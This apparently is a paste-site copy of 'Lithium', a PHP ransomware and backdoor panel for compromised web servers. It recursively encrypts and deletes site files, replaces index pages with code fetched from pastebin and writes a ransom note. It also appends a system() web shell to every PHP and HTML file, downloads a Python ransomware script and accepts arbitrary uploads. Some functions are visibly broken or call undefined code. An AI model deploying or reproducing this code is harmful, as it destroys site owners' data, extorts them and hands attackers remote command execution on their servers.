· 7 years ago · Feb 24, 2018, 12:28 PM
1<?php
2ini_set('display_errors','On');
3error_reporting( E_ERROR );
4
5echo "<h2><center><font color='#FFD700'>Lithium</font></center><br/></h2>";
6
7function encrypt_decrypt($action, $string, $secret_key, $encrypt_method, $iv) {
8 $output = false;
9 $key = hash('sha256', $secret_key);
10 if( $action == 'encrypt' ) {
11 return base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
12 }
13 else if( $action == 'decrypt' ){
14 return openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
15 }
16}
17
18function encfile($file){
19 if (strpos($file, '.htaccess') != false) return;
20 if (strpos($file, '.FS') != false) return;
21 if (strpos($file, 'Readme.html') != false) return;
22 if (strpos($file, 'rans') != false) return;
23 $code = file_get_contents('http://pastebin.com/raw/P5MskjcX');
24 if (strpos($file, 'index') != false) { file_put_contents($file, $code); return;}
25 file_put_contents($file.'.FS', encrypt_decrypt($_POST['encdec'], file_get_contents($file), $_POST['key'], $_POST['mthd'], $_POST['iv']));
26 unlink($file);
27}
28
29function z($file){
30 if (strpos($file, '.htaccess') != false) return;
31 if (strpos($file, 'Readme.html') != false) return;
32 if (strpos($file, 'rans') != false) return;
33 $code = file_get_contents('http://pastebin.com/raw/P5MskjcX');
34 if (strpos($file, 'index') != false) { file_put_contents($file, $code); return;}
35 $dec = encrypt_decrypt('decrypt', file_get_contents($file), $_POST['key'], $_POST['mthd'], $_POST['iv']);
36 $file = substr($file, 0, -3);
37 file_put_contents($file, $dec);
38 unlink($file.'.FS');
39}
40
41function encdir($dir, $func){
42 $j = 0;
43 $files = array_diff(scandir($dir), array('.', '..'));
44 foreach ($files as $filecip){
45 if(is_dir($dir.'\\'.$filecip)){
46 encdir($dir.'\\'.$filecip, $func);
47 }else{
48 $j++;
49 echo "Encrypted in the directory ".$j.' ';
50 $findme = 'z';
51 $findme1 = 'Y';
52 $pos1 = stripos($func, $findme);
53 $pos2 = stripos($func, $findme1);
54 if ($pos1 !== false){
55 echo "file: ".$dir."\\".$filecip." <font color='#6B8E23'>Decrypt!!!</font><br>";
56 }else{
57 echo "file: ".$dir."\\".$filecip." <font color='#800000'>Encrypt!!!</font><br>";
58 }
59 $func($dir.'/'.$filecip);
60 }
61 }
62}
63
64
65function shell($dir, $code) {
66 $files = array_diff(scandir($dir), array('.', '..'));
67 foreach ($files as $filemine){
68 if(is_dir($dir.'\\'.$filemine)){
69 encdir($dir.'\\'.$filemine);
70 }else{
71 $a = stripos(basename($dir.'/'.$filemine), 'php');
72 $b = stripos(basename($dir.'/'.$filemine), 'html');
73 if ($a !== false || $b !== false) {
74 file_put_contents($dir.'/'.$filemine, $code, FILE_APPEND);
75 echo "<dir='ltr'><font face='Tahoma' size='2'><font color='#008000'><br/><br/>".$dir.'/'.$filemine.'<br/></font>';
76 }
77 }
78 }
79}
80
81function mcrypt($file){
82 if (strpos($file, '.htaccess') != false) return;
83 if (strpos($file, '.FS') != false) return;
84 if (strpos($file, 'Readme.html') != false) return;
85 if (strpos($file, 'rans') != false) return;
86 $code = file_get_contents('http://pastebin.com/raw/P5MskjcX');
87 if (strpos($file, 'index') != false) { file_put_contents($file, $code); return;}
88
89 $iv = mcrypt_create_iv(
90 mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
91 MCRYPT_DEV_URANDOM
92 );
93 $key = $_POST['key1'];
94 $encrypted = base64_encode( $iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv));
95 file_put_contents($file.'.FS', $encrypted);
96 unlink($file);
97}
98
99function z1($file){
100 if (strpos($file, '.htaccess') != false) return;
101 if (strpos($file, 'Readme.html') != false) return;
102 if (strpos($file, 'rans') != false) return;
103 $code = file_get_contents('http://pastebin.com/raw/P5MskjcX');
104 if (strpos($file, 'index') != false) { file_put_contents($file, $code); return;}
105 $iv = mcrypt_create_iv(
106 mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
107 MCRYPT_DEV_URANDOM
108 );
109 $key = $_POST['key1'];
110 $dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv);
111 $file = substr($file, 0, -3);
112 file_put_contents($file, $dec);
113 unlink($file.'.FS');
114}
115
116function cxor($file){
117 if (strpos($file, '.htaccess') != false) return;
118 if (strpos($file, '.FS') != false) return;
119 if (strpos($file, 'Readme.html') != false) return;
120 if (strpos($file, 'rans') != false) return;
121 $key = $_POST['key2'];
122 $cipher = '';
123 $f = file_get_contents($file);
124 for($j = 0; $j < strlen($f);){
125 for ($i=0; $i <strlen($key); $i++, $j++) {
126 $cipher.= $f{$j} ^ $key{$j};
127 }
128 }
129 file_put_contents($file.'.FS', $cipher);
130 unlink($file);
131}
132
133?>
134<style type="text/css">
135 body {
136 background-image: url(https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSc6l5MZjxRRbOLgi-XQRjhTEbuQYZ36BCZSbUYo6o-wzSoXJP9);
137 color: #e2e2e2;
138 }
139 .b1 {
140 background: #800000;
141 color: white;
142 font-size: 9pt;
143 }
144</style>
145<body>
146 <form method="POST">
147 <center>
148 Dir:
149 <input type="text" name="direc" value=<?php echo $_SERVER['DOCUMENT_ROOT']; ?> ><br/><br/>
150 <div style="margin-left: 23px;">
151 <select name="case">
152 <option value="php">Backdoor</option>
153 <option value="python">Python Ransomware</option>
154 </select>
155 <input type='submit' value='Upload' name='up'><br/><br/>
156 </div>
157 <input type="file" id="inputfile" name="inputfile">
158 <input type="submit" name="back" value="Click To Upload"><br/><br/>
159 <font color='#6B8E23'>OpenSSL: </font><br/><br/>
160 Key:
161 <input type="text" name="key" class="c1" placeholder="ENC/DEC">
162 Mthd:
163 <select name="mthd">
164 <option value="AES-256-CBC">AES-256-CBC</option>
165 <option value="AES-128-CBC">AES-128-CBC</option>
166 </select>
167 iv:
168 <input type="text" name="iv" placeholder="iv">
169 <select name="encdec">
170 <option value="encrypt">Encrypt</option>
171 <option value="decrypt">Decrypt</option>
172 </select>
173 <input type="submit" name="go" class="b1" value="Enc/Dec"><br/>
174 </center>
175 <center><br/>
176 <font color='#6B8E23'>Mcrypt: </font><br/><br/>
177 Key:
178 <input type="text" name="key1" placeholder="ENC/DEC">
179 <select name="mcrdec">
180 <option value="encrypt">Encrypt</option>
181 <option value="decrypt">Decrypt</option>
182 </select>
183 <input type="submit" name="ok" class="b1" value="Enc/Dec">
184 </center><br/>
185 <center>
186 <font color='#6B8E23'>Xor: </font><br/><br/>
187 Key:
188 <input type="text" name="key2" placeholder="ENC/DEC">
189 <input type="submit" name="enc" class="b1" value="Enc/Dec"><br/><br/>
190 </center>
191 </form>
192</body>
193
194
195<br/><br/><form method='POST'>
196 <center>
197 Message:<br/><br/>
198 <textarea name="dor" rows=12></textarea><br/><br/>
199 <input type='submit' name='enter' value='Write'>
200 </center>
201</form>
202
203<?php
204
205if(isset($_POST['enter'])){
206 $f = fopen("Readme.html", "w");
207 fwrite($f, $_POST['dor']);
208 fclose($f);
209}
210
211if(isset($_POST['go'])){
212 echo '<center><font color="#6B8E23">Website: '.$_SERVER['HTTP_HOST'].'<br/>';
213 echo 'Key: '.$_POST['key'].'<br/>';
214 echo 'Cipher: '.$_POST['mthd'].'<br/>';
215 echo 'iv: '.$_POST['iv'].'<br/>';
216 echo 'Method: OpenSSL</font></center><br/>';
217 if($_POST['encdec'] == 'encrypt'){
218 encdir($_POST['direc'] , 'encfile');
219 }else if($_POST['encdec'] == 'decrypt'){
220 encdir($_POST['direc'] , 'z');
221 }
222}
223
224if(isset($_POST['ok'])){
225 echo '<center><font color="#6B8E23">Website: '.$_SERVER['HTTP_HOST'].'<br/>';
226 echo 'Key: '.$_POST['key1'].'<br/>';
227 echo 'Method: Mcrypt</font></center><br/>';
228 if($_POST['mcrdec'] == 'encrypt') {
229 encdir($_POST['direc'], 'mcrypt');
230 }else if($_POST['mcrdec'] == 'decrypt'){
231 encdir($_POST['direc'] , 'z1');
232 }
233}
234
235if(isset($_POST['enc'])){
236 echo '<center><font color="#6B8E23">Website: '.$_SERVER['HTTP_HOST'].'<br/>';
237 echo 'Key: '.$_POST['key2'].'<br/>';
238 echo 'Method: Xor</font></center><br/>';
239 encdir($_POST['direc'] , 'cxor');
240 Nfile();
241}
242
243if(isset($_POST['up'])){
244 if($_POST['case'] == 'php') {
245 $shell = '<?php system($_GET["com"]); ?>';
246 shell($_POST['direc'], $shell);
247 }else{
248 $d = file_get_contents('http://pastebin.com/raw/UjAGa3Yp');
249 $f = file_put_contents('ransomware.py', $d);
250 }
251}
252
253 if(!empty($_FILES['inputfile'])){
254 $path = __DIR__;
255 $path = $path . basename( $_FILES['inputfile']['name']);
256 if(move_uploaded_file($_FILES['inputfile']['tmp_name'], $path)) {
257 echo "The file ". basename( $_FILES['inputfile']['name']).
258 " has been uploaded";
259 }
260 }
261?>